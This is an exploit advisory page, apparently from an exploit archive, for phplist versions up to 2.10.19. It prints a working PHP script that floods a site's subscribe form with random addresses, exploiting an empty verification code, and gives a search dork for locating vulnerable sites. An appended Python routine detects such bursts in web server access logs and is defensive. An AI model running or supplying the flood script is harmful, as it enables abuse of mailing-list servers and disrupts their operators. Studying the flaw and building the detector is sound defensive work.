phplist version <= 2.10.19 / Arbitrary Subscribe Multiple E-mail

2013.04.27
Credit: Daniel Godoy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: phplist version <= 2.10.19 / Arbitrary Subscribe Multiple E-mail
# Date: 26/04/2013
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software web: http://www.phplist.com/
# Tested on: Linux
# Dork: allinurl: "/lists/?p=subscribe"

<?php
// Configure the NullBot ///////////////////
$flood = "1000000000000000000000000";            // number of subscription requests to send
$sitio = "http://localhost/lists/?p=subscribe";  // target subscribe page
$list  = "anuncios"; // example list name
///////////////////////////////////////////

for ($x = 0; $x < $flood; $x++) {
    // random address per request; the page accepts it without any verification code
    $mail = 'pwn' . rand() . '@pwnme.com';
    $ch = curl_init($sitio);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
        "email=" . $mail . "&emailconfirm=" . $mail . "&htmlemail=1&list%5B3%5D=signup&listname%5B3%5D=" . $list .
        "&VerificationCodeX=&subscribe=Suscribite+alguna+de+las+siguientes+listas.+");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    curl_close($ch);
    ob_flush();
    echo "Flooded with: " . $mail . "<br>";
    flush();
}
?>
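The traffic pattern the script above produces (many POSTs to /lists/?p=subscribe from one source, each with a fresh address) is easy to spot in web server access logs. The following detection routine is an added example for defenders, not part of the advisory or of phplist itself; it assumes Apache-style Common Log Format lines, and the threshold and window values are assumed tuning choices. The log lines embedded in it are constructed.

```python
"""Flag source IPs that burst POST requests to the phplist subscribe page.

Added example (not part of the advisory): reads access log lines, keeps only
POSTs to /lists/?p=subscribe, and reports IPs whose count inside any sliding
WINDOW-second span exceeds THRESHOLD. Thresholds are assumed tuning values."""
import re
from collections import defaultdict
from datetime import datetime

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
SUBSCRIBE_PATH = "/lists/?p=subscribe"
THRESHOLD = 5   # more than this many subscribe POSTs per window is suspicious (assumed)
WINDOW = 60     # seconds (assumed)


def parse_line(line):
    """Return (ip, timestamp, method, path) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path")


def subscribe_bursts(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: peak_count} for IPs whose subscribe POSTs exceed `threshold`
    within any `window`-second span. Uses a two-pointer sliding window per IP."""
    per_ip = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method == "POST" and path == SUBSCRIBE_PATH:
            per_ip[ip].append(ts)

    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            # advance the window start until the span fits inside `window` seconds
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample log: one IP fires 8 subscribe POSTs in 14 seconds,
# a second IP makes two ordinary subscriptions, plus a GET of the form.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Apr/2013:10:00:%02d +0000] '
    '"POST /lists/?p=subscribe HTTP/1.1" 200 512' % s
    for s in range(0, 16, 2)
] + [
    '198.51.100.4 - - [26/Apr/2013:10:00:05 +0000] "GET /lists/?p=subscribe HTTP/1.1" 200 2048',
    '198.51.100.4 - - [26/Apr/2013:10:00:40 +0000] "POST /lists/?p=subscribe HTTP/1.1" 200 512',
    '198.51.100.4 - - [26/Apr/2013:10:30:10 +0000] "POST /lists/?p=subscribe HTTP/1.1" 200 512',
    'not a log line at all',
]

if __name__ == "__main__":
    for ip, count in subscribe_bursts(SAMPLE_LOG).items():
        print("burst from %s: %d subscribe POSTs within %ds" % (ip, count, WINDOW))
```

Run it against a real access log by replacing SAMPLE_LOG with `open(path)`; a hit is a candidate for rate limiting or for enabling the verification code / confirmation step on the subscribe page, which the flood script above leaves empty.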

References:

http://www.phplist.com/


Copyright 2024, cxsecurity.com
